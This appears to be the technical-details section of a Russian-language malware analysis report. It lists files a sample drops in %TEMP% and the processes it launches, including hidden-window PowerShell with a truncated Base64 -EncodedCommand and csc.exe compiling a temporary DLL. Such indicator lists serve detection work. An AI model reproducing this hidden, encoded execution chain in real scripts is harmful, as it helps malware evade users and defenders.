Техническая информация
- %TEMP%\content\4984-192-wscript.exe-14-33-35-437.dump
- %TEMP%\bi5bxovg\bi5bxovg.0.cs
- %TEMP%\bi5bxovg\bi5bxovg.cmdline
- %TEMP%\bi5bxovg\bi5bxovg.out
- %TEMP%\bi5bxovg\csccb2c81c022c74822b61cb5b9edbe322.tmp
- %TEMP%\res29ef.tmp
- %TEMP%\bi5bxovg\bi5bxovg.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAG8AcgBnAGkANgAgAEsATwBMAEwAIABUAEEASABBAFIAUABBACAATgBBAFAATwBMAEUATwBOAFMASwAgAEMAUgBVAFQAIABlAG4AYwBlAHAAaABhAGwAbwBwACAATgBhAGsAawA1ACAAeQBkAGUAcgBwAHUAbgBrAHQAIABVAG4A...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\bi5bxovg\bi5bxovg.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES29EF.tmp" "%TEMP%\bi5bxovg\CSCCB2C81C022C74822B61CB5B9EDBE322.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAG8AcgBnAGkANgAgAEsATwBMAEwAIABUAEEASABBAFIAUABBACAATgBBAFAATwBMAEUATwBOAFMASwAgAEMAUgBVAFQAIABlAG4AYwBlAHAAaABhAGwAbwBwACAATgBhAGsAawA1ACAAeQBkAGUAcgBwAHUAbgBrAHQAIABVAG4A...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\bi5bxovg\bi5bxovg.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES29EF.tmp" "%TEMP%\bi5bxovg\CSCCB2C81C022C74822B61CB5B9EDBE322.TMP"